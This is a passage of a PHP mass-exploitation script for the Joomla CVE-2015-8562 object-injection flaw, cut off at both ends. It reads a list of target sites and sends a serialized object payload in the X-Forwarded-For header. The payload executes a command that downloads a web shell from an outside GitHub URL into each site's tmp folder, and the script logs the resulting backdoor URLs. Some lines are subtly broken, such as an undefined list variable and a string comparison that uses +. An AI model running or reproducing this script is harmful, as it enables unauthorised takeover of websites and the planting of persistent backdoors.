| _SERVER["SCRIPT_FILENAME"] | ';
function banner()
{
echo "\t================================================================\n";
echo "\t Exploit Bug Joomla CVE-2015-8562 \n";
echo "\t Coded By Team NUCT \n";
echo "\t Author : The Jackerz \n";
echo "\t Visit : http://0day.nuct.or.id \n";
echo "\t Original Exploit : https://www.exploit-db.com/exploits/38977 \n";
echo "\t================================================================\n";
}
function how_to()
{
echo "How to Use : php ".$_SERVER["PHP_SELF"]." list_target_joomla\n";
echo "Example : php ".$_SERVER["PHP_SELF"]." list.txt\n";
}
function generate_payload($char)
{
$panjang = strlen($char);
$panjang = ($panjang-1);
$ord = "";
for ($i=0; $i < $panjang; $i++)
{
$ord .= "chr(".ord($char[$i]).").";
}
$ord .= "chr(".ord($char[$i]).")";
return $ord;
}
function export_ke_file($site,$nama_shell)
{
$buka = fopen("joomla_backdoor.txt", a);
fwrite($buka,trim("http://".$site."/tmp/".trim($nama_shell)."\n"));
fclose($buka);
}
function new_file()
{
$buka = fopen("joomla_backdoor.txt", w);
fclose($buka);
}
function end_checking()
{
echo " |\n[*] End Exploit\n";
}
if (!$argv[1])
{
how_to();
exit;
}
new_file();
$buka=fopen("$list","r");
$size=filesize("$list");
if (empty($size))
{
how_to();
echo "File ".$argv[1]." empty\n";
exit;
}
$read=fread($buka,$size);
$sites = explode("\n", $read);
banner();
foreach($sites as $site)
{
if ($site == "http://"+$site)
{
$site = preg_replace("'http://'", '', $site);
}
echo "\n[+] Site : http://".$site;
echo "\n";
echo "[*] Try Get Path Joomla\n";
//ambil cookies
$ch =
curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$site/");
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_USERAGENT, $User_Agent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "cookies.txt");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_exec($ch);
curl_close($ch);
for ($i=0;$i<2;$i++)
{
$ch =
curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$site/");
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_USERAGENT, $User_Agent);
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt");
curl_setopt($ch, CURLOPT_HTTPHEADER, array("X-FORWARDED-FOR: $payload_phpinfo"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$php_info_mentah = curl_exec($ch);
curl_close($ch);
}
//Upload shell
$php_info = explode($SCRIPT_FILENAME,$php_info_mentah);
$path_root_joomla = explode('index.php | ', $php_info[1]);
echo " |\n |=>[+] Path Joomla : ".$path_root_joomla[0]."\n";
echo " |\n[*] Try to upload shell/backdoor\n";
$generate_payload = generate_payload("system('curl https://raw.githubusercontent.com/thejackerz/backdoor/master/indoxploit.txt -o ".$path_root_joomla[0]."tmp/nuct.php && ls ".$path_root_joomla[0]."tmp | grep nuct.php');");
$backdoor = "eval(".$generate_payload.");JFactory::getConfig();exit";
$payload_terakhir=' }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:'.strlen($backdoor).':"'.$backdoor.'";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}����';
$ch =
curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$site/");
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_USERAGENT, $User_Agent);
curl_setopt($ch, CURLOPT_COOKIEJAR, "cookies.txt");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_exec($ch);
curl_close($ch);
for ($i=0;$i<2;$i++)
{
$ch =
curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$site/");
curl_setopt($ch, CURLOPT_TIMEOUT, 20);
curl_setopt($ch, CURLOPT_USERAGENT, $User_Agent);
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookies.txt");
curl_setopt($ch, CURLOPT_HTTPHEADER, array("X-FORWARDED-FOR: $payload_terakhir"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$hasil_akhir_mentah = curl_exec($ch);
curl_close($ch);
}
$hasil_akhir = explode('